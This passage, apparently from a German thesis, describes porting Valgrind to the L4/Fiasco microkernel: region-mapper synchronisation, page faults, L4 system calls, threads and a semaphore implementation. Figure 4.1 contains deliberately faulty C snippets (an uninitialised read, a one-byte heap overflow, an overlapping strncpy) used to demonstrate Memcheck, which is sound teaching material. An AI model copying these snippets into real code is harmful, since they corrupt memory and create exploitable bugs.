und -Freigaben von Valgrind und Gast.
Verwaltung des virtuellen Adressraumes
Ein erstes Problem entsteht bei der Ausführung eines Gastes in Valgrind: Da
Valgrind selbst Speicher benötigt, können Konflikte bei der Benutzung des Adress-
raumes auftreten. Um diese Konflikte zu vermeiden, verwaltet Valgrind den
Adressraum selbst. Dazu versucht Valgrind alle Änderungen am Adressraum zu
verfolgen und auch zu beeinflussen. Sowohl der Region-Mapper von Valgrind so-
wie Valgrinds Speicherverwaltungssystem wollen also den Adressraum verwalten.
37
3 Die Portierung
Lösung 1: Dieses Problem lässt sich lösen durch Synchronisation von Valgrind
und Region-Mapper. Dabei müssen sich Valgrinds internes Speicherverwaltungs-
system und der Region-Mapper bei Änderungen im Adressraum abgleichen.
Lösung 2: Eine weitere Lösung wäre die Integration des Region-Mappers in
Valgrind. Dadurch würde die doppelte Verwaltung des Adressraumes wegfallen,
folglich könnten auch keine Konflikte mehr auftreten. Der Nachteil dieser Lösung
ist der Aufwand: In Valgrind müsste die gesamte Funktionalität eines Pagers
eingebaut werden.
Ein zweites Problem entsteht bei der Ausführung eines Gastes in Valgrind. Wie
oben beschrieben, verfügt Valgrind über ein eigenes Speicherverwaltungssystem
und der Gast über seinen eigenen Region-Mapper. Zur Verwaltung des virtuellen
Adressraumes führen beide Listen über benutzte Bereiche. Da die Verwaltung der
Listen unabhängig voneinander geschieht, haben beide eine inkonsistente Sicht
auf den Adressraum. Wenn der Gast oder Valgrind Speicher allozieren wollen,
müssen sie dazu einen freien Bereich im virtuellen Adressraum finden. Falls
nun bei der Anfrage nach einem freien Bereich Valgrinds Speicherverwaltungs-
system und der Region-Mapper des Gastes das gleiche zurückgeben, entsteht
folgender Konflikt: Valgrind und Gast versuchen in den gleichen Bereich Speicher
einzublenden.
Lösung 1: Eine Lösung für dieses Problem ist die Partitionierung des Adress-
raumes. Valgrind und der Region-Mapper des Gastes verwalten jeweils unter-
schiedliche Bereiche des Adressraumes. Die Möglichkeit, dass beide bei der
Anforderung eines freien Bereichs im Adressraum den gleichen zurückgeben,
wird so ausgeschlossen.
Lösung 2: Außerdem kann das Problem durch Synchronisation von Valgrinds
Speicherverwaltungssystem mit dem Region-Mapper des Gastes gelöst werden.
Sobald einer der beiden Änderungen in seiner Liste vornimmt, müssen diese
dem anderen mitgeteilt werden. Dadurch sind die von Valgrind und dem Region-
Mapper des Gastes verwalteten Listen immer gleich.
Lösung 3: Durch Beschränkung auf einen gemeinsamen Region-Mapper für
Valgrind und Gast entsteht das Problem nicht. Nachteil der Lösung ist, dass der
Region-Mapper des Gastes nicht ausgeführt wird und damit auch nicht analysiert
werden kann. Außerdem kann Valgrind dadurch nur Anwendungen ausführen,
die sich an das L4Env-Konzept halten. Praktisch ist das aber kein Problem, da
dies auf die meisten L4-Anwendungen zutrifft.
Pagefaults während der Ausführung des Gastes
Valgrind führt den Gast, wie in Abschnitt 2.3 beschrieben, in Form von Basic
Blocks aus. Zusätzlich werden die Threads des Gastes nacheinander ausgeführt.
38
3.2 Speicherverwaltung
Beides zusammen führt zu Problemen bei der Behandlung von Pagefaults.
Vom Gast ausgelöste Pagefaults werden durch den Kern zum Region-Mapper
des Gastes weitergeleitet. Der den Pagefault auslösende Thread und der Region-
Mapper des Gastes sind Threads innerhalb von Valgrind. Sobald der Region-
Mapper aktiv wird, laufen also mehrere Threads in Valgrind. Dies verletzt Val-
grinds Annahme, dass immer nur ein Thread aktiv ist.
Durch den Pagefault wird die Ausführung des Gastes innerhalb eines Basic
Blocks unterbrochen. Da nur der Region-Mapper des Gastes den Pagefault auflö-
sen kann, muss dieser jetzt ausgeführt werden und verletzt dadurch die Annahme,
dass Basic Blocks atomar sind und immer als Ganzes ausgeführt werden.
Lösung 1: Einen Region-Mapper für Valgrind und Gast
Das Problem lässt sich durch Beschränkung auf einen Region-Mapper lösen.
Dieser wird gemeinsam von Valgrind und Gast benutzt. Der Region-Mapper wird
nicht interpretiert ausgeführt, läuft also auch nicht unter Valgrinds Kontrolle. Die
Behandlung von Pagefaults des Gastes erfolgt dann in folgenden Schritten:
1. Ein Pagefault tritt im Gast auf.
2. Der Kern leitet den Pagefault zum gemeinsamen Region-Mapper weiter.
3. Der Region-Mapper löst den Pagefault auf.
4. Der unterbrochenen Gast-Threads wird fortgesetzt.
Von Nachteil bei dieser Lösung ist, dass der Region-Mapper des Gastes und
somit die l4rm-Bibliothek nicht geprüft werden kann. Ein weiterer Nachteil
ergibt sich durch die Beschränkung auf L4Env-Programme, da die Lösung auf
der gemeinsamen Nutzung eines Region-Mappers für Valgrind und Gast basiert.
(Wie bereits weiter oben beschreiben, ist die Beschränkung aber kein Problem.)
Abbildung 3.4 zeigt, wie Pagefaults des Gastes unter Benutzung eines Region-
Mappers behandelt werden.
Lösung 2: Jeweils einen Region-Mapper für Gast und Valgrind
Um auch den Region-Mapper des Gastes analysieren zu können, muss dieser
unter Valgrinds Kontrolle ausgeführt werden. Pagefaults des Gastes werden von
Valgrinds Region-Mapper weitergeleitet; der interpretiert ausgeführte Region-
Mapper des Gastes löst diese dann auf. Beim Auftreten eines Pagefaults im Gast
wird der verursachende Thread unterbrochen. Durch Weiterleiten des Pagefaults
wird der Region-Mapper des Gastes aktiv. Es sind also zwei Threads des Gastes
aktiv; beide befinden sich in der Ausführung von Basic Blocks. Die Behandlung
von Pagefaults ändert sich: Valgrind Region-Mapper behandelt Pagefaults des
Gastes nicht selbst, sondern leitet diese zum Region-Mapper des Gastes weiter.
39
3 Die Portierung
ValgrindGast
RegionMapperSemaphore Threadmain Thread
main ThreadSemaphore Thread
Fiasco1
243
Abbildung 3.4: Beschränkung auf einen Region-Mapper
Die Behandlung eines Pagefaults verläuft, wie in Abbildung 3.5 dargestellt, in
folgenden Schritten ab:
1. Ein Pagefault tritt im Gast auf.
2. Der Kern leitet den Pagefault zu Valgrinds Region-Mapper weiter.
3. Der Pagefaults wird zum Region-Mapper des Gastes weitergeleitet.
4. Der Region-Mapper löst den Pagefault auf.
5. Der unterbrochene Gast-Thread wird fortgesetzt.
Zur Implementation wären Änderungen notwendig, die zwei grundlegende Kon-
zepte von Valgrind – Basic Blocks sind atomar und nur ein Thread ist aktiv –
verletzen.
Lösung 3: Rollback von Basic Blocks
Eine weitere Lösungsmöglichkeit besteht darin, die Aktionen des Gastes die zum
Pagefault geführt haben rückgängig zu machen.
Wenn der Gast einen Pagefault auslöst, befindet sich dieser innerhalb eines
Basic Blocks. Es müssen also alle Aktionen, die der Gast innerhalb des Basic
Blocks bereits ausgeführt hat, rückgängig gemacht werden. Danach erfolgt die
Behandlung des Pagefaults. Der Gast wird fortgesetzt, indem er den rückgängig
gemachten Basic Block nochmals ausführt.
40
3.2 Speicherverwaltung
ValgrindRegionMapperSemaphore ThreadGast main Thread
main ThreadSemaphore Thread
FiascoRegion Mapper
1
2
34
5
Abbildung 3.5: Verletzen der Atomaritäts-Annahme
Zum Zurücksetzen des Gastes muss der Zustand der Register, des Speichers
usw. vor der Ausführung des Basic Blocks gesichert werden. Mit dieser Sicherung
des Zustandes kann ein Rollback eines Basic Blocks gemacht werden.
Implementierung
L4/Valgrind beschränkt sich auf einen Region-Mapper für Valgrind und Gast.
Valgrinds Region-Mapper übernimmt dabei die Aufgaben des Region-Mappers
vom Gast. Trotzdem bleibt das Problem der Synchronisation von Valgrinds Spei-
cherverwaltungssystem mit dem Region-Mapper bestehen.
Unter Linux ermittelt Valgrind dazu beim Start den initialen Aufbau des vir-
tuellen Adressraumes. Dies wird durch Lesen und Parsen der virtuellen Datei
/proc/self/maps realisiert. Änderungen verfolgt Valgrind durch die Beobach-
tung von Systemaufrufen, die den Aufbau des Adressraumes modifizieren. Solche
Systemaufrufe sind beispielsweise mmap() und sbrk() .
Demgegenüber ist die Verwaltung und der Aufbau des Adressraumes im L4Env
Aufgabe des Region-Mappers. Für meine Portierung musste der Region-Mapper
um die Funktion
void* l4rm_get_region_list(void)
erweitert werden. Mit dieser Funktion kann auf die Region-List zugegriffen und
damit der Aufbau des Adressraumes ermittelt werden.
41
3 Die Portierung
Alle Interaktionen des Gastes mit dem Region-Mapper und Änderungen am Auf-
bau des virtuellen Adressraumes können durch Beobachtung der in Abbildung 3.1
genannten Funktionen verfolgt werden.
Das Beobachten erfolgt durch den in Abschnitt 2.10 beschriebenen Mechanis-
mus des Funktionswrappings. Dabei werden alle Anfragen an den Region-Mapper
des Gastes durch Valgrind abgefangen. Valgrind leitet die Anfragen an seinen
Region-Mapper weiter und aktualisiert seine eigene Speicherverwaltung.
Bei Speicherallokationen des Gastes entscheidet Valgrinds Speicherverwaltung,
welchen Bereich des Adressraumes der Gast nutzen darf. Mappings, bei denen
der Gast einen Bereich vorgibt, werden von der Speicherverwaltung Valgrinds
auf Konfliktfreiheit geprüft und gegebenenfalls verboten.
Für Speicher, den Valgrind selbst benötigt, nutzt es unter Linux den System-
aufruf mmap zur Speicherallokation. In L4 alloziert Valgrind Speicher mit der
Bibliotheksfunktion mmap() aus der uClibc. Wie unter Linux aktualisiert Valgrind
in L4 dabei sein Speicherverwaltungssystem.
3.3 Kommunikation mit dem Kern
Systemaufrufe sind notwendig, damit Programme, die im Benutzer-Adressraum
ausgeführt werden, mit dem Kern, den Treibern oder auch anderen Programmen
kommunizieren können. Valgrind führt zur Kontrolle und zum Beobachten alle
Systemaufrufe des Gast-Programmes selbst durch. Daher ist es notwendig, dass
Valgrind alle Systemaufrufe kennt, die Gast-Programme nutzen könnten.
Um neue Systemaufrufe in Valgrind zu integrieren, müssen folgende Teile
angepasst werden:
1. LibVEX
2. Systemaufruf-Behandlung in Valgrind ( m_syswrap )
Die LibVEX dient zum Disassemblieren des Gast-Codes. Systemaufrufe des
Gastes werden durch Funktionsaufrufe ersetzt. Ziel der Funktionsaufrufe ist der
Scheduler von Valgrind; dieser führt die Systemaufrufe des Gastes dann aus.
Um Systemaufrufe beobachten und kontrollieren zu können bietet Valgrind die
Möglichkeit, Funktionen zu definieren, die vor bzw. nach dem Aufruf eines Sy-
stemaufrufes ausgeführt werden. Bei der Integration eines neuen Systemaufrufes
in Valgrind müssen diese entsprechend implementiert werden. In den Funktio-
nen können Vor- und Nachbedingungen geprüft und durchgesetzt werden. Bei
blockierenden Systemaufrufen ist es beispielsweise notwendig, das globale Lock
vor der Ausführung abzugeben und nachher sofort wieder zu verlangen (siehe
42
3.3 Kommunikation mit dem Kern
• int l4rm_do_attach(const l4dm_dataspace_t * ds, l4_uint32_t area,
l4_addr_t * addr, l4_size_t size,
l4_offs_t ds_offs, l4_uint32_t flags);
int l4rm_detach(const void * addr)
Funktionen zum Ein- und Ausblenden von Dataspaces in den virtuellen Adressraum.
• l4rm_do_reserve(l4_addr_t * addr, l4_size_t size,
l4_uint32_t flags, l4_uint32_t * area)
l4rm_area_release(l4_uint32_t area)
l4rm_area_release_addr(const void * ptr)
l4rm_area_clear_region(l4_addr_t addr)
l4rm_do_area_setup(l4_addr_t* addr, l4_size_t size,
l4_uint32_t area, int type,
l4_uint32_t flags, l4_threadid_t pager)
Funktionen zum Reservieren, Freigeben und Verwalten von Bereichen im Adressraum.
• l4rm_lookup(const void * addr, l4_addr_t * map_addr,
l4_size_t * map_size, l4dm_dataspace_t * ds,
l4_offs_t * offset, l4_threadid_t * pager)
l4rm_lookup_region(const void * addr, l4_addr_t * map_addr,
l4_size_t * map_size, l4dm_dataspace_t * ds,
l4_offs_t * offset, l4_threadid_t * pager)
Beide Funktionen dienen zur Abfrage des Region-Mappers.
• l4rm_get_userptr(const void *addr)
l4rm_set_userptr(const void *addr, void *ptr)
Schreiben und Lesen von nutzerdefinierten Zeigern.
• l4rm_disable_pagefault_exceptions(void)
l4rm_enable_pagefault_exceptions(void)
l4rm_set_unkown_fault_callback(
l4rm_unknown_fault_callback_fn_t callback)
l4rm_set_unkown_pagefault_callback(
l4rm_pf_callback_fn_t callback)
Der Region-Mapper bietet die Möglichkeit, für nicht auflösbare Pagefaults oder andere
Fehler Funktionen zu registrieren.
• l4_rm_server_loop(void)
Zentrale Serverschleife des Region-Mappers.
• l4rm_init(int have_l4env, l4rm_vm_range_t used[], int num_used)
Funktion zur Initialisierung des Region-Mappers.
• l4rm_show_region_list(void)
Dient zur Ausgabe der Region-List.
• l4rm_region_mapper_id(void)
Gibt die ThreadID des Region-Mappers zurück.
Tabelle 3.1: Funktionen zur Interaktion mit dem Region-Mapper
Einige Funktionen führen zu Veränderungen des Aufbaus des virtuellen
Adressraumes.43
3 Die Portierung
Abschnitt 2.9). Zudem können die Parameter und Ergebnisse der Systemaufrufe
ausgewertet werden.
3.3.1 Systemaufrufe in L4
Im Vergleich zu monolithischen Kernen enthalten Mikrokerne weniger Funktiona-
lität im Kern. Resultierend daraus werden weniger Systemaufrufe benötigt.
Im Vergleich zu Linux werden zum Beispiel keine Systemaufrufe für Dateien
( open() , close() , read() , write() ) benötigt. Um mit Dateien arbeiten zu
können, sind Server in Benutzer-Adressraum notwendig. Zur Kommunikation
mit Servern bieten Mikrokerne IPC in Form von Systemaufrufen an. (Allgemein
können per IPC Tasks und Threads kommunizieren.)
Systemaufrufe können auf x86-kompatiblen Architekturen mit Hilfe von In-
terrupts oder durch SYSENTER /SYSEXIT implementiert werden [2]. Da Valgrind
für Letzteres zur Zeit noch keine Unterstützung bietet, werde ich dies auch nicht
weiter ausführen.
L4 spezifiziert sieben Systemaufrufe [10]:
•ipc– Interprozesskommunikation und Synchronisation ( int 30 )
•id_nearest – Ermitteln der eigenen Thread-ID ( int 31 )
•fpage_unmap – Speicherverwaltung ( int 32 )
•thread_switch – Umschalten zu einem anderen Thread ( int 33 )
•thread_schedule – Scheduling, Festlegen von Prioritäten etc. ( int 34 )
•lthread_ex_regs – Erstellen und Modifizieren von Threads ( int 35 )
•task_new – Erstellen und Löschen von Tasks ( int 36 )
Zusätzlich zu diesen sind in Fiasco zwei weitere Systemaufrufe implementiert:
•privctrl – L4 privilege control ( int 37 )
•ulock – Lock für den Nutzermodus ( int 39 )
44
3.4 Tasks und Threads
3.3.2 Integration der L4-Systemaufrufe in LibVEX und
Valgrind
Die LibVEX bildet Systemaufrufe des Gastes auf Funktionen von Valgrind ab. Um
die Systemaufrufe von L4 zu integrieren, müssen der LibVEX alle von L4 genutzten
Interrupts bekannt gemacht werden. Sobald der Gast einen Systemaufruf startet,
wird eine entsprechende Funktion zum Behandeln des Systemaufrufs in Valgrind
ausgeführt.
Valgrinds Core stellt einen Mechanismus zur Verfügung, mit dem vor und nach
der Ausführung jedes Systemaufrufes des Gastes bestimmte Aktionen durchge-
führt werden können. Für jeden L4-Systemaufruf müssen jeweils zwei Funktionen
definiert werden.
Die Behandlung des L4-Systemaufrufes lthread_ex_regs zum Erstellen und Mo-
difizieren von Threads habe ich unter Wiederverwendung des Valgrind-Codes für
den Linux-Systemaufruf clone implementiert. Mehr Details zu Threads beschreibe
ich in Abschnitt 3.4.1.
Ein Sonderfall ist der Systemaufruf ipc. Dieser kann abhängig von den Parame-
tern blockierend sein. Wie in Abschnitt 2.8 beschrieben, wird vor der Ausführung
von blockierenden Systemaufrufen in Valgrind das Lock abgegeben – folglich
können andere Threads ausgeführt werden – und nach dem Systemaufruf sofort
wieder verlangt. Realisiert wird das Abgeben des Locks mittels eines Flags, dieses
wird vor dem Systemaufruf ipcgesetzt. Ein weiterer blockierender Systemaufruf
istulock . Vor der Ausführung wird wie bei ipcdas Lock abgegeben. Sobald der
Systemaufruf zurückkehrt wird das Lock benötigt um weiter auszuführen.
3.4 Tasks und Threads
3.4.1 Tasks und Threads in L4
In L4 besteht eine Task aus einem virtuellen Adressraum und möglicherweise
mehreren, jedoch mindestens einem Thread. Mit dem Systemaufruf task_new
können neue Tasks erzeugt oder alte gelöscht werden. Bei der Erzeugung einer
L4-Task werden alle Threads mit erstellt, bleiben aber inaktiv.
Threads sind Aktivitäten, die in einem Adressraum ausgeführt werden. Sie sind
eindeutig durch ThreadIDs identifizierbar und können mittels IPC miteinander
kommunizieren. Um ein Thread zu starten, muss dieser mit Hilfe des System-
aufrufes lthread_ex_regs aktiviert werden; dabei werden valide Funktions- und
Stackpointer gesetzt.
45
3 Die Portierung
3.4.2 Tasks und Threads im L4Env
Um Tasks schnell und einfach erzeugen und löschen zu können, stellt das L4Env
denSimple Task Server zu Verfügung. Zusätzlich vereinfacht eine Bibliothek die
Verwaltung von Threads. Mit ihr können Threads erstellt (aktiviert), modifiziert
oder gelöscht (deaktiviert) werden.
Wie in Abschnitt 3.2.2 beschrieben, wird Speicher in L4 im Nutzermodus
verwaltet. Das L4Env stellt dazu den Region-Mapper zur Verfügung. Außerdem
stellt das L4Env zur Synchronisation Semaphoren zur Verfügung. Beides wird
durch je einen Thread realisiert. Zusammen mit dem Thread, der die main() -
Funktion ausführt, besteht jede L4Env-Anwendung aus mindestens drei Threads.
3.4.3 Threads in Valgrind
Valgrind unterstützt, wie in Abschnitt 2.9 beschrieben, Threads. Dabei werden
diese serialisiert nacheinander ausgeführt. Umgesetzt wird die Serialisierung
durch ein globales Lock, das ein Thread zur Ausführung benötigt.
Das Lock Unter Linux ist dieses Lock mittels pipe implementiert. Mit dessen
Hilfe können gepufferte Datenströme zwischen Threads und Tasks erzeugt wer-
den. Da es in L4 keine Implementation von pipe gibt, habe ich das Lock mit
den vom L4Env bereitgestellten Semaphoren realisiert. In Abbildung 3.6 ist die
Implementation von Valgrinds Semaphoren dargestellt.
Threads Unter Linux können neue Threads oder Tasks mit den Systemaufrufen
clone oder forkerzeugt werden. Dabei ist ein neuer Thread bzw. Task immer
zuerst eine Kopie seines Erzeugers.
In L4 werden neue Task mit dem Systemaufruf task_new und neue Threads mit
dem Systemaufruf lthread_ex_regs erzeugt. Zum Erstellen von neuen Threads in
L4 ist ein Funktionspointer und ein Zeiger auf einen gültigen Stack notwendig.
Valgrind besitzt, da es ein L4Env-Programm ist, initial drei Threads. Der erste
Thread ist der Region-Mapper. Dieser ist kein direkter Bestandteil von Valgrind,
wird jedoch zur Verwaltung des Adressraumes und zur Behandlung von Pagefaults
benötigt. Der zweite Thread stellt Semaphoren bereit, der dritte Thread führt
die main() -Funktion aus. Da Valgrinds main() -Funktion am Ende direkt zur
interpretierten Ausführung des ersten Gast-Threads übergeht, führt der dritte
Thread von Valgrind den ersten Gast-Thread aus.
Wie jedes L4Env-Programm besitzt auch der Gast initial drei Threads. Der erste
Thread des Gastes ist dessen Region-Mapper. Wie in Abschnitt 3.2.3 beschrieben
46
3.4 Tasks und Threads
void ML_(sema_init)(vg_sema_t *sema) {
sema->sem = L4SEMAPHORE_INIT(1);
sema->owner_lwpid = -1;
}
void ML_(sema_deinit)(vg_sema_t *sema)
{
vg_assert(sema->owner_lwpid != -1); /* must be initialised */
sema->owner_lwpid = -1;
l4semaphore_up(&(sema->sem));
}
void ML_(sema_down)(vg_sema_t *sema) {
Int lwpid = VG_(gettid)();
vg_assert(lwpid != 0);
vg_assert(sema->owner_lwpid != lwpid); /* can't have it already */
l4semaphore_down(&(sema->sem));
sema->owner_lwpid = lwpid;
}
void ML_(sema_up)(vg_sema_t *sema) {
vg_assert(sema->owner_lwpid != -1); /* must be initialised */
vg_assert(sema->owner_lwpid == VG_(gettid)()); /* must have it */
l4semaphore_up(&(sema->sem));
sema->owner_lwpid = 0;
}
Abbildung 3.6: Implementation der Semaphoren in Valgrind im L4Env
47
3 Die Portierung
wird der Region-Mapper des Gastes nicht ausgeführt. Anstatt also die Server-
schleife des Region-Mappers zu starten, wird der erste Gast-Thread „schlafen
gelegt“. Der zweite Thread - der Semaphore-Thread - wird wie jeder andere
Thread des Gastes interpretiert von Valgrind ausgeführt. Der Dritte führt die
main() -Funktion des Gastes aus.
Ziel von Valgrind ist es, die Ausführung des Gastes so zu gestalten, als würde
das Gast-Programm direkt auf dem System ausgeführt. Um dies auch unter L4
zu gewährleisten wird an den Semaphore-Thread und den main() -Thread von
Valgrind beim Start eine hohe ThreadID vergeben. Valgrinds Region-Mapper bleibt
erster Thread, da Valgrind und Gast einen Region-Mapper zusammen nutzen, wie
in Abschnitt 3.2.3 beschrieben.
Folglich bekommen der Semaphore-Thread und der main() -Thread des Gastes
durch die „Verschiebung“ der Threads von Valgrind die gleiche ThreadID, als
wären sie nicht interpretiert ohne Valgrind ausgeführt worden. Abbildung 3.7
zeigt die Threads von Valgrind und die des Gastes in L4. Dabei bezeichnen die
Zahlen neben den Threads die Reihenfolge ihrer Erstellung. Über den Threads ist
zusätzlich die jeweilige ThreadID angegeben.
ValgrindGast
RegionMapperSemaphore Threadmain Thread
main ThreadSemaphore Thread
FiascoRegion Mapper
1 23 45ThreadID012120121
Abbildung 3.7: Threads in Valgrind
Starten von Threads
Threads werden in L4 mit dem Systemaufruf lthread_ex_regs , siehe Abschnitt 3.4.1,
48
3.4 Tasks und Threads
erstellt (aktiviert). Wie in Abschnitt 2.8 beschrieben, leitet die LibVEX Systemauf-
rufe des Gastes zu Valgrind weiter.
Bei der Erstellung von Threads muss Valgrind sicherstellen, dass es nicht die
Kontrolle über die Ausführung verliert. Das bedeutet, dass ein neuer Thread
niemals direkt nach der Erstellung den Gast-Code ausführen sollte. Stattdessen
sollte direkt nach der Erstellung des Threads eine spezielle Funktion in Valgrind
ausgeführt werden. Aufgabe dieser Funktion ist es, den Thread für die blockweise
Ausführung des Gast-Codes vorzubereiten.
Basierend auf dem Code zur Behandlung von clone in Linux habe ich die
Behandlung von L4-Threads in Valgrind implementiert.
Beendigung von Threads
Genauso wie beim Starten von Threads muss Valgrind beim Beenden sicherstellen,
dass es nicht die Kontrolle über die Ausführung des Gastes verliert. Jeder Thread
in Valgrind hat zwei Kontexte – den des Gastes und den von Valgrind. Wenn es
dem Gast nun möglich wäre, vorbei an Valgrind einen Thread zu beenden, würde
dadurch auch ein Thread von Valgrind beendet werden.
Um dies zu verhindern, fängt Valgrind den Aufruf der Funktion __do_exit
des Gastes ab und beendet den Thread selbst.
3.4.4 Tasks in Valgrind
Mit meiner Portierung von Valgrind auf L4 können vollständige L4Env-Tasks in
Valgrind ausgeführt und analysiert werden.
In Linux „folgt“ Valgrind bei Angabe des Parameters --trace-children
allen Kind-Tasks. „Folgen“ bedeutet, dass die neuen Tasks auch unter Valgrinds
Kontrolle ausgeführt werden. Dadurch werden alle Tasks, die ein Gast (laufend
in Valgrind) erstellt, automatisch analysiert. Implementiert ist dies mit Hilfe des
Systemaufrufes fork, der eine Kopie des gesamten laufenden Tasks erzeugt.
Da es in L4 keine Implementierung von forkgibt, habe ich den Mechanismus
des „Folgens“ in L4 /Valgrind deaktiviert.
Eine mögliche Implementation von forkfür L4 müsste als erstes eine neue
Task erstellen, danach alle bestehenden Mappings duplizieren. Abschließend
kann die neue Task gestartet werden. Im Detail könnte die fork| folgendermaßen
implementiert werden:
1.Erstellen einer neuen Task und Vorbereitung des ersten Threads der neuen
Task.
2.Duplizieren aller Mappings, damit der erste Thread – der Region-Mapper –
der neuen Task laufen kann.
49
3 Die Portierung
3.Starten der neuen Task, d.h. nur der Region-Mapper-Thread der Task wird
gestartet.
4.Der Region-Mapper der neuen Task dupliziert alle restlichen Mappings. Da-
zu wäre eine Synchronisation der Region-Mapper der neuen und der alten
Task notwendig. Das Duplizieren der Mappings erfordert eine Kooperation
mit den Dataspace-Managern. Im Detail müssten die Dataspace-Manager
entscheiden, ob der jeweilige Dataspace gemeinsam genutzt werden kann
oder dupliziert werden muss.
5. Erstellen und Starten der restlichen Threads der neuen Task.
Mit dieser Implementation könnte Valgrinds Mechanismus des „Folgens“ von
Kind-Tasks in L4 bei der Analyse verwendet werden.
50
4 Auswertung
Ziel dieses Kapitels ist die Zusammenfassung der Ergebnisse meiner Portierung.
Dazu stelle ich im ersten Teil die Standard-Tools von Valgrind vor und erläutere
ihre Besonderheiten und Einschränkungen. Im zweiten Teil bewerte ich die
Geschwindigkeit von L4 /Valgrind.
4.1 Die Test-Umgebung
Alle in diesem Kapitel beschriebenen Messungen sind auf dem gleichen Test-
Rechner durchgeführt worden:
•Intel Core 2 T7400 2.16 GHz CPU
•2GB RAM
•Linux Ubuntu 8.10 x86
•Fiasco DD-L4(v2) /ia32
Alle benötigten Binaries und Dateien befinden sich für die Tests und die Messun-
gen in einer Ramdisk.
4.2 Die Valgrind-Standard-Tools auf L4
Valgrind ist ein Framework zum Entwickeln von Analyse-Tools und zum Testen
von Programmen. Zu Valgrind gehören acht Standard-Tools.
Im Rahmen der Portierung von Valgrind auf L4 habe ich die einzelnen Tools
untersucht, inwiefern diese unter L4 einsetzbar sind. Im Folgenden beschreibe
ich die Standard-Tools von Valgrind und die Einsatzmöglichkeiten unter L4.
51
4 Auswertung
Memcheck
Memcheck hilft beim Finden von Fehlern in der Speicherverwaltung eines Pro-
grammes. Alle Lese- und Schreibzugriffe sowie die Funktionsaufrufe der Funktio-
nen malloc() , new() , free() , delete() werden dazu verfolgt und überprüft.
Während andere „Speicherchecker “ nur auf Byte- oder Word-Ebene Fehler suchen,
ist es mit Memcheck möglich, auf Bit-Ebene Fehler zu finden [26].
Prinzipiell lässt sich Memcheck für L4Env-Programme nutzen. Im L4Env gibt
es neben malloc() noch andere Möglichkeiten, Speicher zu allozieren. Bei-
spielsweise können sich L4Env-Programme bei DMphys einen Dataspace mit
physischem Speicher allozieren und diesen mit Hilfe des Region-Mappers in den
Adressraum einblenden. Um auch diese Speicherallokationen verfolgen zu kön-
nen, müssen Funktionen wie l4rm_do_attach() und l4rm_detach() durch
Memcheck überwacht werden.
{ // bug1
int x, y, z;
x = ( x == 0 ? y : z);
}
{ // bug2
char *c = malloc(sizeof(char) * 16);
int i;
for (i = 0; i < 16; i++) {
*(c + i) = '0';
}
*(c + i + 1) = '\n';
}
{ // bug3
char *c1 = malloc(sizeof(char) * 16);
char *c2;
int i;
for (i = 0; i < 15; i++) {
*(c1 + i) = '0';
}
*(c1 + 15) = '\0';
c2 = c1;
c2 += 8;
strncpy(c2, c1, 15);
}
Abbildung 4.1: Quellcode mit Programmierfehlern, die Memcheck erkennen und
beschreiben kann
52
4.2 Die Valgrind-Standard-Tools auf L4
Ein großer Vorteil von Memcheck ist die Genauigkeit der Fehlerbeschreibun-
gen. Memcheck liefert eine Beschreibung des Fehlers und die genaue Position
im Quellcode (vorausgesetzt, das Binary wurde mit Debuginformationen über-
setzt). Abbildung 4.1 zeigt drei Programmierfehler, die Memcheck erkennt. Der
erste Fehler entsteht bei der Benutzung der nicht initialisierten Variable xzur
Sprungentscheidung. Memcheck erkennt dies und meldet den Fehler:
Conditional jump or move depends on uninitialised value(s)
at 0x8048409: main (bugs.c:8)
Beim zweiten Fehler werden 16 Byte Speicher alloziert. Insgesamt werden
jedoch 17 Byte beschrieben. Der Fehler wird erkannt und Memcheck beschreibt
zusätzlich, wann der Speicher alloziert wurde:
Invalid write of size 1
at 0x8048453: main (bugs.c:17)
Address 0x41a2039 is 1 bytes after a block of size 16 alloc'd
at 0x4025D2E: malloc (vg_replace_malloc.c:207)
by 0x804842A: main (bugs.c:12)
Der dritte Fehler entsteht bei dem Versuch, String c1nach String c2zu ko-
pieren. Dabei überlappen sich die diese. Memcheck erkennt den Fehler und
beschreibt ihn:
Invalid write of size 1
at 0x40265A3: strncpy (mc_replace_strmem.c:291)
by 0x80484AD: main (bugs.c:37)
Address 0x41a2078 is 0 bytes after a block of size 16 alloc'd
at 0x4025D2E: malloc (vg_replace_malloc.c:207)
by 0x8048461: main (bugs.c:26)
Source and destination overlap in strncpy(0x41A207F, 0x41A2077, 15)
at 0x402661B: strncpy (mc_replace_strmem.c:291)
by 0x80484AD: main (bugs.c:37)
53
4 Auswertung
Cachegrind & Callgrind
Cachegrind ist ein Cache-Profiler. Dazu simuliert Cachegrind die L1- und L2-
Caches des Prozessors. Jegliche Speicherzugriffe, die zu Cache-Misses führen,
können damit gefunden werden. Cachegrind speichert während der Ausführung
alle Analyse-Daten in einer Datei. Mit KCachegrind [3]können so die Ergebnisse
der Analyse grafisch dargestellt werden.
Callgrind ist eine Erweiterung zu Cachegrind, mit der Funktionsaufrufgraphen
erstellt werden können. Wie Cachegrind liefert auch Callgrind zusätzlich eine
Datei mit den Ergebnissen, die mit KCachegrind visualisiert werden kann. Als
Beispiel zeigt Abbildung 4.2 den Funktionsaufrufgraphen des L4Env-Startcodes.
Beide Werkzeuge können ohne Anpassungen auf L4 eingesetzt werden.
Abbildung 4.2: Aufrufgraph des L4Env-Startcodes
54
4.2 Die Valgrind-Standard-Tools auf L4
Massif
Massif ist ein Heap-Profiler. Mit ihm kann untersucht werden, welcher Pro-
grammteil wieviel Speicherbedarf hat. Dazu macht Massif Snapshots bei jeder
Speicherallokation und -freigabe. Das Ergebnis gibt Massif in eine Datei aus.
Mit dem zugehörigen Skript ms_print können ein Diagramm generiert und die
Stellen im Programm, an denen der Speicher alloziert wird, ausgegeben werden.
Abbildung 4.3 zeigt den Speicherverbrauch von tinycc unter L4. Massif stellt auf
der X-Achse die Anzahl der ausgeführten Instruktionen und auf der Y-Achse den
verbrauchten Speicher dar.
--------------------------------------------------------------------------------
Command: /data/tinycc --stderr /log/tinycc --stdout /log/tinycc
-bench -c /data/test_input_for_tinycc.c -o /tmp/a.out
Massif arguments: --massif-out-file=/tmp/massif.out
ms_print arguments: massif.out
--------------------------------------------------------------------------------
KB
409.3^ # . . . .
| # : : : : . . . . . :
| # : : : : : : : : : :
| # : : : : . : : : : : : :
| # : : : : : : :: : : :: : : : : ::
| # : : : : : : :: : : :: : : : : ::
| # : : : : : : :: : : :: : : : : ::
| #.: : : :. : . :. :: : . : :: : : . . . . . .:. .:, .::
| #:: : : :: : : :: :: : : : :: : : : : : : : ::: ::@ :::
| #:: : .: :: : : :: :: : : :. :: : :. : : : : : ::: ::@ :::
